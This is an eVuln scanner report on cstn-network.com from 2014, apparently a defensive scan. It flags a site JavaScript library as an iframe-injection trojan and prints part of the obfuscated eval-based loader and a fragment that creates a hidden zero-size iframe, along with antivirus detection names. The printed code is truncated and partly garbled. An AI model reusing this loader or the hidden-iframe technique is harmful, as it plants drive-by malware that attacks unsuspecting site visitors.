New scan:

Malware Scanner report for cstn-network.com

Malicious/Suspicious/Total urls checked
1/0/16
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "cstn-network.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cstn-network.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://cstn-network.com/
HTTP/1.1 200 OK
Date: Sun, 11 May 2014 19:07:10 GMT
Accept-Ranges: bytes
ETag: "e0ea655a2e45c81:43a"
Server: Microsoft-IIS/6.0
Content-Length: 9649
Content-Location: http://cstn-network.com/Index.html
Content-Type: text/html
Last-Modified: Sun, 23 Dec 2007 06:37:56 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
clean
http://cstn-network.com/index.html
200 OK
Content-Length: 9649
Content-Type: text/html
clean
http://cstn-network.com/GeneratedItems/CSScriptLib.js
200 OK
Content-Length: 93293
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)



CSStateArray = new Object;
CSCookieArray = new Object;
CSCookieValArray = new Object;
function CSWriteCookie(action) {
var name = "DFT" + action[1];
var hrs = action[2];
var path = action[3];
var domain = action[4];
var secure = action[5];
var exp = new Date((new Date()).getTime() + hrs * 3600000);
var cookieVal = "";
for(var prop in CSCookieArray) {
if(("DFT" + CSCookieArray[prop]) == name) {
i
... 103423 bytes are skipped ...
06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}
if(f)e(s);}

Decoded script:


j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
... 32997 bytes are skipped ...
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {
}
}, 500 */
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.see

Antivirus reports:

nProtect
JS:Trojan.Iframer.C
K7AntiVirus
Trojan
Emsisoft
JS:Trojan.Iframer.C (B)
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Trojan:JS/Iframeinject.AB
MicroWorld-eScan
JS:Trojan.Iframer.C
F-Secure
JS:Trojan.Iframer.C
F-Prot
JS/IFrame.QW
GData
JS:Trojan.Iframer.C
Commtouch
JS/IFrame.QW
BitDefender
JS:Trojan.Iframer.C

http://cstn-network.com/Innovative.html
200 OK
Content-Length: 5879
Content-Type: text/html
clean
http://cstn-network.com/Index.html
200 OK
Content-Length: 9649
Content-Type: text/html
clean
http://cstn-network.com/Value.html
200 OK
Content-Length: 8332
Content-Type: text/html
clean
http://cstn-network.com/resource.html
200 OK
Content-Length: 8896
Content-Type: text/html
clean
http://cstn-network.com/Other/CSScriptLib.js
200 OK
Content-Length: 85849
Content-Type: application/x-javascript
clean
http://cstn-network.com/Strategic.html
200 OK
Content-Length: 6068
Content-Type: text/html
clean
http://cstn-network.com/EQM.html
200 OK
Content-Length: 10078
Content-Type: text/html
clean
http://cstn-network.com/News.html
200 OK
Content-Length: 7368
Content-Type: text/html
clean
http://cstn-network.com/Sustainable.html
200 OK
Content-Length: 8870
Content-Type: text/html
clean
http://cstn-network.com/Social.html
200 OK
Content-Length: 6047
Content-Type: text/html
clean
http://cstn-network.com/redrock.html
200 OK
Content-Length: 7637
Content-Type: text/html
clean
http://cstn-network.com/Kawartha.html
200 OK
Content-Length: 7594
Content-Type: text/html
clean
http://cstn-network.com/test404page.js
404 Not Found
Content-Length: 1070
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cstn-network.com

Result:
HTTP/1.1 200 OK
Date: Sun, 11 May 2014 19:07:10 GMT
Accept-Ranges: bytes
ETag: "e0ea655a2e45c81:43a"
Server: Microsoft-IIS/6.0
Content-Length: 9649
Content-Location: http://cstn-network.com/Index.html
Content-Type: text/html
Last-Modified: Sun, 23 Dec 2007 06:37:56 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: PleskWin
X-Powered-By: ASP.NET

...9649 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cstn-network.com
Referer: http://www.google.com/search?q=cstn-network.com

Result:
The result is similar to the first query. There are no suspicious redirects found.